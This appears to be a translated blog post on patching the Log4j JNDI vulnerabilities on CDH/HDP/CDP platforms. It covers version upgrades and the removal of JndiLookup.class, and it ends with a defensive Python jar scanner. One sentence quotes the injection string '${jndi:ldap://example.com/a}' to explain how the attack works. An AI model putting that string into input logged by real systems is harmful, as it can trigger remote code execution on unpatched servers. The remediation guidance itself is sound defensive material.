How to quickly deal with the Log4j JNDI series vulnerabilities on big data platforms such as CDH / HDP / CDP

Hello everyone, I am a bright brother!

Recently log4j has been making waves because of its JNDI vulnerabilities, and it has kept everyone busy for a while.

Let's take a look at how to quickly deal with the Log4j JNDI series vulnerabilities on big data platforms such as CDH / HDP / CDP.

1 log4j overview
2 Log4j JNDI series vulnerability overview
3 In-depth understanding of Log4j and JNDI
4 Coping with the Log4j JNDI series vulnerabilities
5 How common big data components cope with the Log4j JNDI series vulnerabilities
6 How to quickly deal with the Log4j JNDI series vulnerabilities on big data platforms such as CDH / HDP / CDP

1 log4j overview

Apache log4j is a Java-based open-source logging framework. Apache log4j2 builds on log4j, borrows ideas from another logging framework, logback, makes many improvements and adds a lot of rich features.

In terms of implementation, log4j2 separates the API from the implementation, splitting into log4j-core and log4j-api: the former is the concrete implementation of the logging framework (logback is another concrete implementation), while the latter is the logging facade / logging abstraction (Simple Logging Facade for Java, SLF4J, is another logging facade / logging abstraction).

In terms of performance, log4j2 uses asynchronous loggers (when application code calls logger.log, the I/O operation is actually handed to a separate I/O thread and control returns to the application thread immediately); in a multithreaded environment it can achieve 18 times the throughput of log4j 1.x and logback, with lower latency.

Architecturally, log4j2 uses a plugin mechanism: users do not need to write any extra code and can configure it according to their own situation, and log4j2 automatically recognizes the configuration file and uses the plugins configured in it.

It is precisely because of the above advantages that log4j has become the most widely used logging framework in the Java ecosystem.

2 log4j JNDI series vulnerability overview

The recent JNDI series of vulnerabilities comprises the following three:

CVE-2021-44228: discovered and reported by Alibaba Cloud on December 9. Based on this vulnerability, an attacker can construct a malicious request that triggers remote code execution. The Log4j team released version 2.15.0 immediately after learning of the issue and gave a temporary mitigation. (Severity: critical)
CVE-2021-45046: discovered and reported by Twitter on December 14. It shows that the fix for CVE-2021-44228 in 2.15.0 and the temporary mitigation given for it were incomplete: under certain configurations they can still be used to cause a DoS attack. After learning of the issue the Log4j team released version 2.16.0 and gave a new temporary mitigation. (Severity: critical)
CVE-2021-45105: discovered and confirmed on December 18. It further shows that version 2.16.0 and the temporary fix for CVE-2021-45046 still carry a risk of DoS attack under certain configurations. The Log4j team then immediately released version 2.17.0 and gave a new temporary fix. (Severity: moderate)

All of the above JNDI series vulnerabilities have been fixed. In summary, CVE-2021-44228 and CVE-2021-45046 are the ones rated critical, and the solutions are as follows:

Log4j 1.x is not impacted by this vulnerability.
log4j2: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later).
log4j2: In any release other than 2.16.0, you may remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
log4j2: Users are advised not to enable JNDI in Log4j 2.16.0, since it still allows LDAP connections.

3 In-depth understanding of Log4j and JNDI

The above JNDI series vulnerabilities can be traced back to a feature introduced early in Log4j 2's life, LOG4J2-313: JNDI Lookup Plugin support: in 2013, log4j added the "JNDI Lookup Plugin" feature in version 2.0-beta9.

JNDI is a directory service API introduced by Java in the 1990s and an important part of J2EE; it allows a Java program to look up data in the form of Java objects. JNDI provides a variety of SPIs that support different directory services, such as CORBA COS (Common Object Services), the Java RMI (Remote Method Invocation) registry and LDAP (Lightweight Directory Access Protocol).

According to the official JNDI documentation, "If your LDAP server is on another machine or is using another port, then you need to edit the LDAP URL": the LDAP server can run on a different machine, or anywhere on the Internet, not only locally. This flexibility means that if an attacker can control the LDAP URL, they can make the Java program load objects from a server under their control.

In a vulnerable version of log4j, the attacker controls the LDAP URL that log4j accesses by getting a string such as “${jndi:ldap://example.com/a}” into a logged message. In that case log4j connects to the LDAP server at example.com and retrieves an object from it.

We will not go into more JNDI details here; those interested can do their own homework. The key points are summarized below:

- JNDI is an important part of J2EE. It was introduced in the 1990s and is widely used in application containers such as JBoss, WebLogic and WebSphere. Today, with monolithic frameworks giving way to increasingly popular microservice architectures, most people use the Spring Boot / Spring Cloud technology stack and do not use JNDI at all (especially at Internet companies and SMEs, many engineers may never have learned JNDI).
- The "JNDI Lookup Plugin Support" introduced by LOG4J2-313 was mostly added to cater to large customers who adopt a monolithic architecture and use application containers such as JBoss, WebLogic and WebSphere.
- Where log4j is used in microservice architectures, most users do not use its "JNDI Lookup Plugin Support" feature.
- The big data components that use log4j do not use its "JNDI Lookup Plugin Support" feature either.

4 Coping with the Log4j JNDI series vulnerabilities

Fundamentally, the approach to dealing with the Log4j JNDI series vulnerabilities is as stated in the official documentation:

- Log4j 1.x: this series is not affected, because it does not have the LOG4J2-313 "JNDI Lookup Plugin Support" feature described above.
- log4j2: the formal solution is a version upgrade, i.e. upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later).
- log4j2: as a temporary solution, delete the dangerous JndiLookup.class from the class load path; this can be used on any version other than 2.16.0 (essentially because we do not use log4j's "JNDI Lookup Plugin Support" feature).
- log4j2: do not enable the JNDI function: for version 2.16.0, users can also disable JNDI through configuration to avoid the potential risk of an LDAP connection being established (2.16.0 provides a configuration item to switch JNDI on or off, so there is no need to delete the dangerous JndiLookup.class from the class load path).

If your application code depends on log4j directly, you can flexibly adopt any of the above solutions; the most recommended is of course upgrading the log4j version. If your application code pulls in log4j indirectly, you can adopt the temporary solution, i.e. delete the dangerous JndiLookup.class from the class load path, or wait for the upstream project's official fixed version and upgrade to it.

5 How common big data components cope with the Log4j JNDI series vulnerabilities

- Spark: the latest Spark version is 3.2.0, which still depends on log4j 1.2.17, i.e. the log4j 1.x series, so it is not affected by the above vulnerabilities.
- Flink: judging by the log4j versions Flink uses, Flink 1.11 and later are affected by the above vulnerabilities, so the official fix is to upgrade Flink. The Flink community has released fixed versions for the 1.11 / 1.12 / 1.13 / 1.14 series; upgrade to the latest version of the same series according to your own situation and the problem is fixed. Thanks to the Flink community's prompt response and fix, you do not need to resort to the various temporary fixes (whose main idea is to delete JndiLookup.class from log4j-core, which has the effect of disabling JNDI).

6 How to quickly deal with the Log4j JNDI series vulnerabilities on big data platforms such as CDH / HDP / CDP

Because big data platforms such as CDH / HDP / CDP contain many big data components, and the communities behind those components cannot all be expected to respond quickly, fix the above log4j JNDI series vulnerabilities and provide an official fixed version, the fastest way to respond on CDH / HDP / CDP and similar platforms is to adopt the temporary solution described above, i.e. delete the dangerous JndiLookup.class from the class load path (essentially because, at the bottom layer, none of these big data components use log4j's "JNDI Lookup Plugin Support" feature).

At the same time, to make the temporary solution easier to apply, Cloudera provides a series of scripts on GitHub to help delete the dangerous JndiLookup.class on big data platforms such as CDH / HDP / CDP.

Other big data platforms, such as TDH, follow a similar idea; you can refer to the scripts described above and adapt them.

You can download the scripts from GitHub yourself; the download link is: https://github.com/cloudera/cloudera-scripts-for-log4j.git
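Since the Cloudera scripts themselves are not reproduced on this page, here is an added, self-contained Python sketch of the same idea (not the Cloudera scripts and not any project's code) covering both the temporary solution of section 4 and the platform-wide clean-up of section 6: walk a directory, identify log4j-core jars and their version from pom.properties, compare against the fixed versions listed above (2.3.1 / 2.12.3 / 2.17.0, with 1.x unaffected), and strip JndiLookup.class from the affected jars while keeping a backup, which is the same effect as the official zip -q -d command. The two jars it creates in a temporary directory are constructed samples containing only the entries the scanner examines.

```python
import shutil
import tempfile
import zipfile
from pathlib import Path

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def parse_version(version: str) -> tuple:
    """'2.17.0' -> (2, 17, 0); '2.0-beta9' -> (2, 0, 0). A non-numeric part ends the parse."""
    parts = []
    for piece in version.split("-")[0].split("."):
        if not piece.isdigit():
            break
        parts.append(int(piece))
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])


def is_fixed(version: str) -> bool:
    """Fixed per the advice above: 1.x is unaffected; 2.x needs 2.3.1 / 2.12.3 on those branches, else 2.17.0."""
    v = parse_version(version)
    if v[0] < 2:
        return True
    if v[:2] == (2, 3):
        return v >= (2, 3, 1)
    if v[:2] == (2, 12):
        return v >= (2, 12, 3)
    return v >= (2, 17, 0)


def inspect_jar(jar_path) -> dict:
    """Report the log4j-core version (from pom.properties, if present) and whether JndiLookup.class is inside."""
    with zipfile.ZipFile(jar_path) as zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
    finding = {"path": str(jar_path), "version": version, "has_jndi_lookup": JNDI_CLASS in names}
    # A jar with the class but without a known-fixed version gets the temporary mitigation.
    needs_work = finding["has_jndi_lookup"] and not (version and is_fixed(version))
    finding["action"] = "remove JndiLookup.class (or upgrade)" if needs_work else "none"
    return finding


def strip_jndi_lookup(jar_path) -> Path:
    """Rewrite the jar without JndiLookup.class (what `zip -q -d` does), keeping a .bak copy for rollback."""
    jar_path = Path(jar_path)
    backup = jar_path.with_name(jar_path.name + ".bak")
    shutil.copy2(jar_path, backup)
    with zipfile.ZipFile(backup) as src, zipfile.ZipFile(jar_path, "w") as dst:
        for info in src.infolist():
            if info.filename != JNDI_CLASS:
                dst.writestr(info, src.read(info.filename))
    return backup


def scan_tree(root) -> dict:
    """Map jar file name -> finding for every *.jar under root (archives nested inside jars are not unpacked)."""
    return {p.name: inspect_jar(p) for p in sorted(Path(root).rglob("*.jar"))}


def make_sample_jar(path, version: str) -> None:
    """Constructed sample: a fake log4j-core jar holding only the entries the scanner looks at."""
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(POM_PROPS, f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
        zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # fixed releases still contain the class; version decides


def demo() -> tuple:
    """Create two constructed jars, remediate the affected one and rescan; returns (before, after) findings."""
    root = Path(tempfile.mkdtemp(prefix="log4j-scan-"))
    make_sample_jar(root / "log4j-core-2.14.1.jar", "2.14.1")  # affected: gets the class stripped
    make_sample_jar(root / "log4j-core-2.17.0.jar", "2.17.0")  # fixed release: left alone
    before = scan_tree(root)
    for finding in before.values():
        if finding["action"] != "none":
            strip_jndi_lookup(finding["path"])
    after = scan_tree(root)
    shutil.rmtree(root)
    return before, after


if __name__ == "__main__":
    for label, findings in zip(("before", "after"), demo()):
        for name, f in findings.items():
            print(f"{label}: {name} version={f['version']} jndi={f['has_jndi_lookup']} action={f['action']}")
```

On a real cluster the sketch would be run against the parcel or package directories with the affected services stopped, and the services restarted afterwards so the rewritten jars are actually loaded; it does not descend into jars packed inside other archives, and it treats a jar with JndiLookup.class but no readable pom.properties as affected, which errs on the side of removing the class.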